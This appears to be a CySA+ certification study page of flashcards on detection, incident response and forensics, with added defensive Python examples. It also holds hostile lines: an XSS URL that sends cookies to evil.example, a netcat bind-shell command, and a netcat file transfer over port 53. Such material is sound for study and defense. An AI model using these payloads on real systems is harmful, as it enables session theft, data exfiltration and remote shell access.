CySA+


ARP Spoofing/ARP Poisoning

- occurs when an attacker sends forged ARP replies so that a victim's IP address (often the default gateway) is mapped to the attacker's MAC address instead of the legitimate one, letting the attacker intercept or alter traffic on the segment - can cause irregular peer-to-peer communications - use an IDS to identify the suspicious traffic patterns caused by ARP poisoning: far more ARP traffic than usual, and one IP address being claimed by more than one MAC address
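
The two indicators above (one IP claimed by several MACs, and an ARP reply rate far above normal) can be checked from a capture of ARP replies. The following is an added example, not code from the original page; the reply records and the thresholds are constructed for illustration.

```python
"""Detect ARP poisoning indicators in a list of observed ARP replies.

Signals from the flashcard: (1) one IP address being claimed by more than
one MAC address, (2) one MAC answering for many IPs, and (3) an abnormally
high ARP reply rate. The packet records below are constructed.
"""
from collections import Counter, defaultdict

# Constructed sample: (timestamp_seconds, sender_ip, sender_mac) taken from
# ARP "is-at" replies seen on one segment. 10.0.0.1 is the default gateway.
SAMPLE_ARP_REPLIES = [
    (0.0, "10.0.0.1", "aa:aa:aa:aa:aa:01"),
    (1.0, "10.0.0.7", "aa:aa:aa:aa:aa:07"),
    (2.0, "10.0.0.1", "aa:aa:aa:aa:aa:01"),
    # attacker (MAC de:ad:...:99) starts claiming the gateway and a host, in a burst
    (3.0, "10.0.0.1", "de:ad:be:ef:00:99"),
    (3.1, "10.0.0.1", "de:ad:be:ef:00:99"),
    (3.2, "10.0.0.7", "de:ad:be:ef:00:99"),
    (3.3, "10.0.0.1", "de:ad:be:ef:00:99"),
    (3.4, "10.0.0.7", "de:ad:be:ef:00:99"),
]


def find_ip_conflicts(replies):
    """Return {ip: sorted MAC list} for every IP claimed by more than one MAC."""
    macs_by_ip = defaultdict(set)
    for _, ip, mac in replies:
        macs_by_ip[ip].add(mac)
    return {ip: sorted(macs) for ip, macs in macs_by_ip.items() if len(macs) > 1}


def find_mac_claiming_many_ips(replies, threshold=2):
    """Return MACs that answer for `threshold` or more distinct IP addresses."""
    ips_by_mac = defaultdict(set)
    for _, ip, mac in replies:
        ips_by_mac[mac].add(ip)
    return sorted(mac for mac, ips in ips_by_mac.items() if len(ips) >= threshold)


def reply_rate_spikes(replies, window=1.0, max_per_window=3):
    """Bucket replies into `window`-second slots; return the buckets over the limit."""
    buckets = Counter(int(ts // window) for ts, _, _ in replies)
    return {b: n for b, n in sorted(buckets.items()) if n > max_per_window}


if __name__ == "__main__":
    print("IP -> multiple MACs:", find_ip_conflicts(SAMPLE_ARP_REPLIES))
    print("MACs claiming many IPs:", find_mac_claiming_many_ips(SAMPLE_ARP_REPLIES))
    print("ARP reply bursts (bucket -> count):", reply_rate_spikes(SAMPLE_ARP_REPLIES))
```

On a real network the same logic runs over `arp` replies from a sniffer; the rate threshold has to be tuned to the segment's normal ARP volume, since a large flat network legitimately produces bursts after an outage.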

Google Hacking

- open-source intelligence technique that uses Google search operators to locate vulnerable web servers and applications - use things like: quotes (exact phrase), NOT, AND/OR, scope operators (site:, filetype:), URL modifiers (inurl:, intitle:)

Footprinting *

- phase of an attack or penetration test in which the attacker or tester gathers information about the target before attacking it (usually targeting multiple machines) - uses tools that map out the layout of a network, typically in terms of IP address usage, routing topology, and DNS namespace (subdomains and hostnames)

Legitimate processes (Behavior Analysis)

1. System Idle (PID 0) and System (PID 4) 2. Client Server Runtime SubSystem (csrss.exe) 3. WININIT (wininit.exe) 4. Services (services.exe, which should be the parent of every svchost.exe instance) * 5. Local Security Authority SubSystem (lsass.exe) 6. WINLOGON (winlogon.exe) 7. USERINIT (userinit.exe) 8. Explorer (explorer.exe, should be the parent of all processes launched by the user)

Cryptographic Analysis Tools

- tools used to determine the type of encryption algorithm used and assess the strength of the encryption key - an analyst must recover or brute force the user password to obtain the decryption key for an encrypted volume

Best practices to secure network appliances

1. use ACLs to restrict management access to designated host devices 2. limit management to designated interfaces and monitor them 3. deny Internet access to remote management

Disadvantages of Agent-based Scanning

1. agents are limited to a particular operating system 2. could be compromised by malware

Detection and Analysis IOCs Sources (technical and non-technical)

1. anti-malware software 2. NIDS/NIPS 3. HIDS/HIPS 4. system logs 5. network device logs 6. SIEM data 7. flow control device 8. internal personnel 9. external personnel 10. cyber-threat intelligence

What might make a process look suspicious?

1. any process name that you do not recognize 2. any process name that is similar to a legitimate system process (e.g. scvhost.exe masquerading as svchost.exe) 3. processes that appear without an icon, version information, description, or company name 4. processes that are unsigned, especially ones claiming to come from a well-known publisher like Microsoft 5. any process whose digital signature doesn't match the identified publisher 6. any process that does not have the expected parent/child relationship with a principal Windows process (e.g. a user application whose parent is not explorer.exe) 7. any process hosted by Windows utilities like Explorer, Notepad, or Task Manager (a sign of process injection) 8. any process that is packed (compressed), highlighted purple in Process Explorer (while this lesson focused on manual analysis, many UEBA products can automate this process)
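
The legitimate-process list and the suspicious-process checklist above can be turned into a triage pass over a process listing. This is an added example, not code from the original page; the process table is constructed (what tasklist /v or Process Explorer would show), and the parent/child expectations are the standard Windows ones from the list.

```python
"""Triage a Windows process listing against the legitimate-process checklist.

Checks: unrecognised or look-alike names (scvhost.exe vs svchost.exe),
unsigned images, missing publisher, an image running from a temp folder,
and a core process whose parent is not the one Windows would give it.
The listing is constructed for this example.
"""
import difflib

# Expected parent for the core Windows processes (lowercase names).
EXPECTED_PARENT = {
    "smss.exe": "system",
    "csrss.exe": "smss.exe",
    "wininit.exe": "smss.exe",
    "services.exe": "wininit.exe",
    "lsass.exe": "wininit.exe",
    "svchost.exe": "services.exe",
    "winlogon.exe": "smss.exe",
    "userinit.exe": "winlogon.exe",
    "explorer.exe": "userinit.exe",
}
LEGIT_NAMES = sorted(set(EXPECTED_PARENT) | {"system", "system idle process"})

# Constructed sample listing.
SAMPLE_PROCESSES = [
    {"pid": 4, "name": "System", "ppid": 0, "signed": True, "publisher": "Microsoft",
     "path": r"C:\Windows\System32\ntoskrnl.exe"},
    {"pid": 500, "name": "wininit.exe", "ppid": 400, "signed": True, "publisher": "Microsoft",
     "path": r"C:\Windows\System32\wininit.exe"},
    {"pid": 600, "name": "services.exe", "ppid": 500, "signed": True, "publisher": "Microsoft",
     "path": r"C:\Windows\System32\services.exe"},
    {"pid": 900, "name": "svchost.exe", "ppid": 600, "signed": True, "publisher": "Microsoft",
     "path": r"C:\Windows\System32\svchost.exe"},
    {"pid": 2200, "name": "explorer.exe", "ppid": 2000, "signed": True, "publisher": "Microsoft",
     "path": r"C:\Windows\explorer.exe"},
    # look-alike name, unsigned, no publisher, launched from a temp folder
    {"pid": 3100, "name": "scvhost.exe", "ppid": 2200, "signed": False, "publisher": "",
     "path": r"C:\Users\bob\AppData\Local\Temp\scvhost.exe"},
    # genuine svchost.exe image, but its parent is explorer.exe instead of services.exe
    {"pid": 3200, "name": "svchost.exe", "ppid": 2200, "signed": True, "publisher": "Microsoft",
     "path": r"C:\Windows\System32\svchost.exe"},
]


def lookalike(name):
    """Return the legitimate name this one closely resembles, or None."""
    lower = name.lower()
    if lower in LEGIT_NAMES:
        return None
    match = difflib.get_close_matches(lower, LEGIT_NAMES, n=1, cutoff=0.8)
    return match[0] if match else None


def triage(processes):
    """Return {pid: [reasons]} for every process that trips one of the checks."""
    by_pid = {p["pid"]: p for p in processes}
    findings = {}
    for p in processes:
        reasons = []
        name = p["name"].lower()
        look = lookalike(p["name"])
        if look:
            reasons.append(f"name resembles legitimate {look}")
        elif name not in LEGIT_NAMES:
            reasons.append("unrecognised process name")
        if not p["signed"]:
            reasons.append("image is unsigned")
        if not p["publisher"]:
            reasons.append("no publisher/company name")
        if "\\temp\\" in p["path"].lower():
            reasons.append("running from a temp folder")
        expected = EXPECTED_PARENT.get(name)
        parent = by_pid.get(p["ppid"])  # parent may have exited (userinit.exe normally does)
        if expected and parent and parent["name"].lower() != expected:
            reasons.append(f"parent is {parent['name']}, expected {expected}")
        if reasons:
            findings[p["pid"]] = reasons
    return findings


if __name__ == "__main__":
    for pid, reasons in triage(SAMPLE_PROCESSES).items():
        print(pid, "->", "; ".join(reasons))
```

The look-alike check uses a similarity ratio rather than an exact list because attackers vary the misspelling (svch0st, svchosts, scvhost); the parent check deliberately skips processes whose parent has already exited, which is normal for explorer.exe.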

5 categories of events in the Windows event logs

1. application (events generated by applications and services) 2. security (audit events like failed log-on or access being denied) 3. system (events generated by the operating system and its services) 4. setup (events generated during the installation of Windows) 5. forwarded events (events that are sent to the local host from other computers)

How do attackers compromise and exploit the controller area network (CAN) bus?

1. attach the exploit to OBD-II 2. exploit over onboard cellular (cell modem) 3. exploit over onboard Wi-Fi

Steps of a XSS attack

1. attacker identifies an input validation vulnerability within a trusted website 2. attacker crafts a URL to perform code injection against the trusted website 3. the trusted site returns a page containing the injected malicious code 4. the malicious code runs in the client's browser with the same permissions (same origin) as the trusted site
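
Steps 1 to 3 above, reduced to code: a search endpoint that concatenates the query parameter into its HTML (the input validation flaw) next to the same endpoint with output encoding applied. This is an added example, not code from the original page; the crafted URL, host names and page template are constructed.

```python
"""Reflected XSS: the vulnerable page builder beside the fixed one.

The crafted URL (step 2) carries a script in the `q` parameter; the trusted
site (step 3) echoes it back. With output encoding the browser renders the
payload as text instead of executing it. Everything below is constructed.
"""
import html
from urllib.parse import parse_qs, urlsplit

# Constructed attacker URL: exfiltrates document.cookie to a site the attacker controls.
CRAFTED_URL = (
    "https://trusted.example/search?q="
    "<script>document.location='https://evil.example/?c='%2Bdocument.cookie</script>"
)


def query_param(url, name):
    """Extract one query parameter the way a web framework would (URL-decoded)."""
    return parse_qs(urlsplit(url).query).get(name, [""])[0]


def vulnerable_page(q):
    # No validation or encoding: the payload is inserted as live markup.
    return f"<h1>Results for {q}</h1>"


def safe_page(q):
    # Output encoding turns < > & " ' into entities; the browser shows text only.
    return f"<h1>Results for {html.escape(q, quote=True)}</h1>"


def contains_script_tag(page):
    """True if the page still carries an executable <script> element."""
    return "<script>" in page.lower()


if __name__ == "__main__":
    q = query_param(CRAFTED_URL, "q")
    print("vulnerable:", vulnerable_page(q))
    print("safe:      ", safe_page(q))
```

Output encoding is the fix for step 4, because it is applied at the point where untrusted data meets HTML; input validation on its own is easy to bypass with alternative encodings.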

Newer Implementations of Syslog (improvements for drawbacks)

1. can use TCP (port 1468, or 6514 with TLS) instead of UDP 514 for reliable delivery 2. can use TLS to encrypt messages sent to servers 3. can use MD5 and SHA-1 hashes for authentication and integrity 4. can use message filters, automated log analysis, event response scripting, and alternate message formats 5. newer implementations of the server include syslog-ng and rsyslog

How can you mitigate a DDoS Attack?

1. conduct real-time log analysis to identify patterns of suspicious traffic and redirect it to a black hole or sinkhole 2. use geolocation and IP reputation data to redirect or ignore suspicious traffic 3. aggressively close slower connections by reducing timeouts on affected servers 4. use caching and backend infrastructure to offload processing to other servers 5. use enterprise DDoS protection services such as Cloudflare or Akamai

How do you mitigate non-standard port usage on your networks?

1. configure firewalls to allow only whitelisted ports to communicate on ingress and egress interfaces 2. configuration documentation should also show which server ports are allowed on any given host type (have good configuration management) 3. configure detection rules to detect mismatched protocol usage over a standard port

How can you detect and mitigate against a pass the hash attack? *

1. detecting these types of attacks is very difficult because the attacker activity cannot be easily differentiated from legitimate authentication 2. most antivirus and antimalware software will block tools that allow pass the hash attack (such as Mimikatz) 3. restrict and protect high privileged domain accounts 4. restrict and protect local accounts with administrative privileges 5. restrict inbound traffic using Windows Firewall to all workstations except for helpdesk, security compliance scanners and servers

How does an APT use modern malware to operate?

1. dropper or downloader 2. maintain access 3. strengthen access 4. actions on objectives 5. concealment

5 Steps for Conducting Containment (in order)

1. ensure the safety and security of all personnel 2. prevent an ongoing intrusion or data breach 3. identify if the intrusion is the primary or secondary attack 4. avoid alerting the attacker that the attack has been discovered 5. preserve any forensic evidence of the intrusion and attack

4 Key Controls for Mitigating Vulnerabilities in Specialized Systems

1. establish administrative control over operational technology (OT) networks by recruiting staff with relevant expertise 2. implement the minimum network links by disabling unnecessary links, services, and protocols 3. develop and test a patch management program for operational technology (OT) networks 4. perform regular audits of logical and physical access to systems to detect possible vulnerabilities and intrusions (*WARNING: Enumeration tools and vulnerability scanners can cause problems on OT networks*)

3 types of Trend Analysis

1. frequency-based 2. volume-based 3. statistical deviation
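
The third type, statistical deviation, is the one that needs a baseline. This added example (not from the original page) scores new daily counts against a 14-day baseline with a z-score and also shows the volume-based view of the same spike; the daily counts are constructed.

```python
"""Statistical-deviation trend analysis over a daily event count.

Frequency-based and volume-based trending ask "how often" and "how much";
statistical deviation asks "how far from the established baseline". A
z-score against a 14-day baseline flags a failed-logon spike. Counts are
constructed for this example.
"""
from statistics import mean, pstdev

# Constructed: failed-logon events per day (e.g. Windows Security log, event 4625).
BASELINE = [12, 15, 11, 14, 13, 12, 16, 14, 13, 15, 12, 14, 13, 15]
OBSERVED = {"day15": 14, "day16": 61, "day17": 10}


def z_scores(baseline, observed):
    """z = (value - mean) / stdev for each observation; inf on a flat baseline."""
    mu, sigma = mean(baseline), pstdev(baseline)
    if sigma == 0:  # flat baseline: any change at all is a deviation
        return {k: (0.0 if v == mu else float("inf")) for k, v in observed.items()}
    return {k: (v - mu) / sigma for k, v in observed.items()}


def deviations(baseline, observed, threshold=3.0):
    """Return the observation keys whose |z| exceeds `threshold`."""
    scores = z_scores(baseline, observed)
    return sorted(k for k, z in scores.items() if abs(z) > threshold)


def volume_ratio(baseline, value):
    """Volume-based view: this value as a multiple of the baseline mean."""
    return round(value / mean(baseline), 2)


if __name__ == "__main__":
    print("z-scores:", {k: round(z, 2) for k, z in z_scores(BASELINE, OBSERVED).items()})
    print("deviations:", deviations(BASELINE, OBSERVED))
    print("day16 volume ratio:", volume_ratio(BASELINE, 61))
```

A z-score threshold of 3 is a common starting point, but logon counts are rarely normally distributed across weekdays and weekends, so in practice the baseline is built per day-of-week or per user group.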

Forensic Procedures Four Main Areas:

1. identification 2. collection 3. analysis 4. reporting

What do you do when you find a suspicious process?

1. identify how the process interacts with the Registry and file system 2. determine how the process was launched 3. determine if that image file is located in the system folder or a temp folder 4. determine what files are being manipulated by the process 5. determine if the process restores itself upon reboot after deletion 6. determine if a system privilege or service gets blocked if you delete the process 7. determine if the process is interacting with the network (communication with CnC server)

What might indicate that a piece of malware is running on a port instead of an authorized application?

1. if an unknown open dynamic port (49152-65535) appears to be constantly open on a host, it may indicate a malicious traffic channel 2. non-standard port usage - communicating TCP/IP application traffic, such as HTTP, FTP, or DNS, over a port that is not the well-known or registered port established for that protocol
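
Both indicators above, plus the egress allow-list from the non-standard-port mitigation list earlier on this page, can be checked from flow records that carry the application protocol identified by payload inspection (as Zeek's conn.log "service" field does). This is an added example, not code from the original page; the flow records, internal prefix and allow-list are constructed.

```python
"""Flag non-standard port usage, persistent dynamic-port sessions and
egress allow-list violations in constructed flow records.

Each record is (src_ip, dst_ip, dst_port, identified_service, duration_s).
The well-known port table and the 10.1.0.0/24 internal prefix are
assumptions for this example.
"""
WELL_KNOWN = {"http": {80, 8080}, "https": {443, 8443}, "dns": {53}, "ftp": {21}, "ssh": {22}}
DYNAMIC = range(49152, 65536)
INTERNAL = "10.1.0."

FLOWS = [
    ("10.1.0.5", "93.184.216.34", 443, "https", 12),
    ("10.1.0.5", "10.1.0.53", 53, "dns", 0),
    ("10.1.0.9", "203.0.113.8", 53, "http", 300),            # HTTP over the DNS port
    ("10.1.0.9", "203.0.113.8", 8080, "http", 5),
    ("10.1.0.12", "198.51.100.2", 4444, "ssh", 60),          # SSH on a non-standard port
    ("198.51.100.7", "10.1.0.12", 60123, "unknown", 86400),  # day-long inbound session to a dynamic port
]


def is_internal(ip):
    return ip.startswith(INTERNAL)


def port_mismatches(flows):
    """Flows where the identified protocol is not on its well-known/registered port."""
    out = []
    for src, dst, port, service, _ in flows:
        expected = WELL_KNOWN.get(service)
        if expected is not None and port not in expected:
            out.append((src, dst, port, service))
    return out


def persistent_dynamic_ports(flows, min_seconds=3600):
    """Inbound sessions to a dynamic port on an internal host held open >= min_seconds."""
    return [(dst, port, dur) for src, dst, port, _, dur in flows
            if port in DYNAMIC and dur >= min_seconds and is_internal(dst) and not is_internal(src)]


def egress_violations(flows, allowed_ports=frozenset({80, 443, 53})):
    """Outbound flows to a destination port that is not on the egress allow-list."""
    return [(src, dst, port) for src, dst, port, _, _ in flows
            if is_internal(src) and not is_internal(dst) and port not in allowed_ports]


if __name__ == "__main__":
    print("protocol/port mismatches:", port_mismatches(FLOWS))
    print("persistent dynamic-port sessions:", persistent_dynamic_ports(FLOWS))
    print("egress violations:", egress_violations(FLOWS))
```

The mismatch check only works when the sensor identifies the protocol from payload rather than from the port number, which is exactly why the egress allow-list on the firewall is the complementary control: it blocks the attempt whether or not the protocol was recognised.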

4 categories of severity inside the Windows event logs

1. information (used for successful events) 2. warning 3. error (significant problems that could result in reduced functionality) 4. audit success/failure

What kind of things can we expect to find when you start analyzing the image from memory?

1. list of running processes at the time of collection 2. password hashes 3. cryptographic keys (which can help you unlock encrypted hard drives that you wouldn't be able to access after you shut down the computer) 4. Registry keys 5. cached files 6. strings from open files

Four Most Common Categories to Perform System Memory Image Acquisition:

1. live acquisition 2. crash dump 3. hibernation file 4. pagefile

3 Different Ways to Perform Disk Image Acquisition

1. live acquisition (capturing the contents of the disk drive while the computer is still running) 2. static acquisition by shutting down 3. static acquisition by pulling the plug

To effectively deploy a SIEM you must consider *

1. log all relevant events and filter irrelevant data 2. establish and document scope of events 3. develop use cases to define a threat 4. plan incident response to an event 5. establish a ticketing process to track events 6. schedule regular threat hunting 7. provide auditors and analysts an evidence trail

Linux File System Analysis Tools

1. lsof 2. df 3. du

Rule options for IDS/IPS logs (Snort)

1. msg 2. flow 3. flags 4. track 5. reference 6. classtype 7. sid and rev
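
To see where those options sit, here is a small parser that splits a Snort rule into its header and its option keywords. This is an added example, not code from the original page; the rule it parses is constructed for illustration and is not from any published ruleset.

```python
"""Parse a Snort rule into header fields and an options dict.

The rule is constructed for this example. Option values may contain
quoted strings (msg, content), so the option list is split on ';' only
outside quotes; keywords that may repeat (content, reference, pcre) are
collected into lists.
"""
import re

SAMPLE_RULE = (
    'alert tcp $EXTERNAL_NET any -> $HOME_NET 445 '
    '(msg:"Example SMB service control access"; flow:to_server,established; '
    'flags:PA; content:"|5c|svcctl"; reference:url,example.invalid/smb-notes; '
    'classtype:attempted-admin; sid:1000001; rev:2;)'
)

HEADER_RE = re.compile(
    r'^(\w+)\s+(\w+)\s+(\S+)\s+(\S+)\s+(->|<>)\s+(\S+)\s+(\S+)\s*\((.*)\)\s*$'
)
OPTION_RE = re.compile(r'((?:[^;"]|"[^"]*")+);')   # one "keyword:value" up to a ';' outside quotes
REPEATABLE = {"content", "reference", "pcre"}


def parse_rule(rule):
    """Return {"action", "protocol", "src", "sport", "direction", "dst", "dport", "options"}."""
    m = HEADER_RE.match(rule.strip())
    if not m:
        raise ValueError("not a Snort rule")
    action, proto, src, sport, direction, dst, dport, body = m.groups()
    options = {}
    for raw in OPTION_RE.findall(body):
        key, _, value = raw.strip().partition(":")
        key, value = key.strip(), value.strip().strip('"')
        if key in REPEATABLE:
            options.setdefault(key, []).append(value)
        else:
            options[key] = value      # flag-style options like "nocase" get ""
    return {"action": action, "protocol": proto, "src": src, "sport": sport,
            "direction": direction, "dst": dst, "dport": dport, "options": options}


def sid_rev(parsed):
    """(sid, rev) as integers: the pair that identifies a rule version in alerts."""
    return int(parsed["options"]["sid"]), int(parsed["options"]["rev"])


if __name__ == "__main__":
    parsed = parse_rule(SAMPLE_RULE)
    print(parsed["action"], parsed["protocol"], parsed["dst"], parsed["dport"])
    for k, v in parsed["options"].items():
        print(f"  {k}: {v}")
```

When an IDS alert is triaged, sid and rev are what you look up in the ruleset to read the exact signature that fired; reference and classtype give the external context and the severity bucket.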

Best practices for configuring egress filters

1. only allow whitelisted application ports and destination addresses to leave your network 2. restrict DNS lookups to trusted and authorized DNS services 3. Block access to known bad IP address ranges (blacklist) 4. Block all internet access from host subnets that don't use it (ICS/SCADA systems)

4 Main Types of Recovery Actions

1. patching 2. permissions 3. logging 4. system hardening

3 types of Port Security

1. physical port security 2. MAC filtering 3. Network Access Control (NAC)

Digital Forensic Analysts Have Many Different Roles, Including:

1. planning IT systems and processes 2. investigating and reconstructing an incident 3. investigating if crimes occurred 4. collecting and protecting evidence 5. determining if data was exposed (data breach) 6. developing processes and tools 7. supporting ongoing audits

Key Features of a NAC solution

1. posture assessment 2. remediation 3. pre- and post-admission control

Linux Tools for Detecting Malicious Processes

1. pstree 2. ps

Advantages for using Agent-based scanning

1. reduces the impact on the network by reducing the network bandwidth 2. reduces the chance of service outages 3. better for mobile or remote devices when offline

System Hardening Security Checklist

1. remove or disable devices that are not needed or used 2. install OS, application, firmware, and driver patches regularly 3. uninstall all unnecessary network protocols 4. uninstall or disable all unnecessary services and shared folders 5. enforce ACLs on all system resources 6. restrict user accounts to the least privileges needed 7. secure the local admin or root account by renaming it and changing the default password 8. disable unnecessary default user and group accounts 9. verify permissions on system accounts and groups 10. install antimalware software and update its definitions regularly

Windows Tools for Detecting Malicious Processes

1. sfc (System File Checker) - scans protected Windows system files, verifies that they haven't been modified, and replaces any that have 2. Process Monitor (Sysinternals) 3. Process Explorer (Sysinternals) 4. tasklist 5. PE Explorer

Symptoms of anomalous activity include

1. strange log entries 2. excessive per-process ports 3. resource consumption 4. unusual user accounts

Different Ways Covert Channels Can Take Advantage

1. transmit data over nonstandard port (if egress filter on firewall is not enabled) 2. encoding data in TCP/IP packet headers 3. segmenting data in multiple packets 4. obfuscating data using hex 5. transmitting encrypted data

3 Simple Mottos for System Hardening *

1. uninstall anything you aren't using 2. if you need it, patch it frequently 3. always restrict users to least privilege

Unexpected Output (Anomalous Activity)

- unusual request patterns or responses can be indicative of an ongoing or past attack - detect a code injection by monitoring number of database reads or examining HTTP response packet sizes - if an application displays unformatted error messages or strange strings, it could be an indication of application tampering

Netcat (nc)

- utility for reading and writing raw data over a network connection that is often used as a listener for remote shells - can also be used with scripting or redirection to send and receive files

Unexpected Outbound Communication (Anomalous Activity)

- verify any outbound network connections (must understand and approve any connections leaving your network) - unexpected outbound communication could be a sign of a C2 channel or beaconing

Lost System Logs (Virtualization Forensics)

- virtual machines are optimized to spin up when needed and be destroyed when no longer required - *Solution* configure virtual machines to log events to a remote logging server to prevent system logs from being lost during deprovisioning

grep command line tools

-i (ignore case sensitivity) -v (return non-matching strings) -w (treat search strings as words) -c (return a count of matching strings only) -l (return names of files with matching lines) -L (return names of files without matching lines)

dir /Ax

/Ax filters all file/folder types that match the given attribute (x), such as dir /AH, which displays only hidden files and folders

dir /Q

/Q displays who owns each file, along with the standard information

dir /R

/R displays alternate data streams for a file

Basic principles for configuring firewall ACLs

1. Block incoming requests from internal or private, loopback, and multicast IP address ranges 2. Block incoming requests from protocols that should only be used locally (ICMP, DHCP, OSPF, SMB, etc) 3. configure IPv6 to either block all IPv6 traffic or allow it to authorized hosts and ports only

Order of Volatility (Descending from most volatile to least)

1. CPU registers and cache memory 2. contents of system memory (RAM), routing tables, ARP cache, process table, temporary swap files 3. data on persistent mass storage (HDD/SDD/flash drive) 4. remote logging and monitoring data 5. physical configuration and network topology 6. archival media

5 Different Types of Breaches (descending from most significant to least)

1. Data Exfiltration (an attacker breaks into the system and transfers data to another system) 2. Insider Data Exfiltration (an employee/ex employee with privileges on the system transfers data to another system) 3. Device Theft/Loss (a device, such as a smartphone or laptop, containing data is lost or stolen) 4. Accidental Data Breach (public disclosure of information or unauthorized transfer caused by human error or misconfiguration) 5. Integrity/Availability Breach (corruption of data or destruction of a system processing data)

Incident Classification Categories

1. Data integrity (any incident where data is modified or loses integrity) 2. System Process Criticality (incidents that disrupt or threaten a mission essential business function) 3. Downtime (an incident that degrades or interrupts the availability of an asset, system, or business process) 4. Economic (an incident that creates short-term or long-term costs) 5. Data Correlation (an incident that is linked to the TTP of known adversary groups with extensive capabilities) 6. Reverse Engineering (an incident which the capabilities of the malware are discovered to be linked to an adversary group) 7. Recovery Time (an incident which requires extensive recovery time due to its scope or severity) 8. Detection Time (an incident which was not discovered quickly)

Defensive Capabilities

1. Detect 2. Destroy 3. Degrade 4. Disrupt 5. Deny 6. Deceive

Forensic Tools Include:

1. EnCase 2. The Forensic Toolkit (FTK) 3. The Sleuth Kit

7 Step Process for Scanning Workflow (Vulnerability Scanning)

1. Install software and patches to establish a baselined system 2. perform an initial scan of the target system 3. analyze the assessment reports based on the baseline 4. perform corrective actions based on reported findings 5. perform another vulnerability scan and assessment 6. document any findings and create reports for relevant stakeholders 7. conduct ongoing scanning to ensure continual remediation (*Scan, Patch, Scan*)

Command and Control servers must issue commands to its zombies in the botnet using various communication channels, these include:

1. Internet Relay Chat (IRC) 2. HTTP and HTTPS 3. Domain Name System (DNS) 4. Social Media Websites 5. Cloud Services 6. Media and Document Files

Common Tools Used by Pentesters

1. Metasploit 2. Cobalt Strike 3. Kali Linux 4. ParrotOS 5. Commando OS

Incident Response Phases (CompTIA model)

1. Preparation 2. Detection & Analysis 3. Containment 4. Eradication & Recovery 5. Post-Incident Activity

How do you set up a listener to receive a file?

1. Set up a listener to receive the file: nc -l -p 53 > database.sql 2. Send the file to the listener: type database.sql | nc 10.1.0.21 53 (type prints the file to the screen, but by piping it into netcat we push its contents to the listener instead; the listener writes whatever arrives into database.sql and exits when the sender disconnects)
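
The same listener/sender exchange, replayed with Python sockets on the loopback interface so both sides can be watched in one process. This is an added example, not code from the original page; the port is chosen by the OS rather than being 53, and the file contents are constructed.

```python
"""The netcat file transfer above, reproduced with Python sockets.

Listener side = `nc -l -p PORT > database.sql`; sender side =
`type database.sql | nc HOST PORT`. Runs entirely on 127.0.0.1 with an
OS-assigned port; the "database.sql" bytes are constructed.
"""
import socket
import threading

PAYLOAD = b"CREATE TABLE users (id INT, pw_hash TEXT);\n" * 20  # constructed file contents


def start_listener(received):
    """Bind on loopback, accept one connection, read until EOF into `received`."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))   # port 0: let the OS pick a free port
    srv.listen(1)

    def serve():
        conn, _ = srv.accept()
        with conn:
            while chunk := conn.recv(4096):   # like nc, read until the sender closes
                received.append(chunk)
        srv.close()

    t = threading.Thread(target=serve, daemon=True)
    t.start()
    return srv.getsockname()[1], t


def send_file(host, port, data):
    """The `type file | nc host port` side: connect, write everything, close for writing."""
    with socket.create_connection((host, port)) as c:
        c.sendall(data)
        c.shutdown(socket.SHUT_WR)   # EOF tells the listener the file is complete


def transfer(data=PAYLOAD):
    """Run listener and sender together; return the bytes the listener collected."""
    received = []
    port, thread = start_listener(received)
    send_file("127.0.0.1", port, data)
    thread.join(timeout=5)
    return b"".join(received)


if __name__ == "__main__":
    got = transfer()
    print(f"listener received {len(got)} bytes, matches sender: {got == PAYLOAD}")
```

Note what the transfer does not have: no authentication, no integrity check and no encryption. That is why the same pattern shows up in exfiltration, and why an egress filter that blocks unexpected outbound connections stops it.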

How do you set up a bind shell on a victim system?

1. Set up a listener on the victim that serves a shell: nc -l -p 443 -e cmd.exe (-l = listen, -p = port, -e = execute the named program and attach it to the connection) 2. Connect to the listener from the attacker's machine: nc 10.1.0.1 443 (10.1.0.1 = the IP address of the listener you are connecting to)

Common IDS/IPS softwares

1. Snort 2. Zeek (Bro) 3. Security Onion

Types of SIEM solutions

1. Splunk 2. ELK/Elastic Stack 3. ArcSight 4. QRadar 5. Alien Vault and OSSIM 6. Graylog

A nmap discovery scan is used to ...

Footprint the network

What is the key difference between Fingerprinting and Footprinting?

Footprinting is focused on the overall network layout, while Fingerprinting is focused on a single host or server

While a pass the hash attack will work on local workstations, a _______ ticket is needed in an Active Directory environment

Kerberos

Port 445 (UDP)

MICROSOFT-DS (Supports Windows File Sharing)

Port 445 (TCP)

MICROSOFT-DS (supports Windows File Sharing ~Server Message Block over TCP/IP~ on current Windows networks) (Windows only)

Malware Information Sharing Projects (MISP - Indicator Management)

MISP provides a server platform for cyber threat intelligence sharing; it uses its own open JSON-based format, supports OpenIOC definitions, and can import and export STIX over TAXII

Port 1434 (UDP port)

MS-SQL (Microsoft SQL Server) (Windows only)

Port 135 (UDP)

MSRPC (advertises what RPC services are available in a Windows environment)

Port 135 (TCP)

MSRPC (advertises what RPC services are available in a Windows environment) (Windows only)

_____ and _____ help to determine which business functions are critical and to specify appropriate risk countermeasures

MTD, RPO

Deny

Prevent an adversary from learning about your capabilities or accessing your information assets (ex. Firewall ACL, NIPS, Proxy filter, Patch, chroot jail)

FTP Access Logs

a log containing FTP traffic events in a W3C extended log format

Business Continuity Loss

a loss associated with no longer being able to fulfill contracts and orders due to the breakdown of critical systems

Cross-Site Request Forgery (XSRF/CSRF)

a malicious script hosted on the attacker's site that can exploit a session started on another site in the same browser

behavior-based detection

a malware detection method that evaluates an object based on its intended actions before it can actually execute that behavior

Splunk

a market-leading big data information gathering and analysis tool that can import machine-generated data via a connector or visibility add-on

eFUSE

a means for software or firmware to permanently alter the state of a transistor on a computer chip (once an eFUSE is blown it cannot be reset, so it can record that an older firmware version is no longer valid or trusted and prevent rollback to it)

Memory Overflow

a means of exploiting a vulnerability in an application to execute arbitrary code or to crash the process (or with an ongoing memory leak to crash the system)

Flow Collector

a means of recording metadata and statistics about network traffic rather than recording each frame

Reimaging

a method of restoring a system that has been sanitized using an image-based backup

Reconstruction

a method of restoring a system that has been sanitized using scripted installation routines and templates

Zero-fill

a method of sanitizing a drive by overwriting all bits on a drive to zero (typically done with hard drives)

Cryptographic Erase (CE)

a method of sanitizing a self-encrypting drive (common on SSDs) by erasing the media encryption key, which leaves the data on the media unreadable ciphertext

Secure Erase (SE)

a method of sanitizing a solid-state device (SSDs) using manufacturer provided software

Secure Disposal

a method of sanitizing that utilizes the physical destruction of the media by mechanical shredding, incineration, or degaussing (used for top secret data or high classification)

Domain Generation Algorithm (DGA)

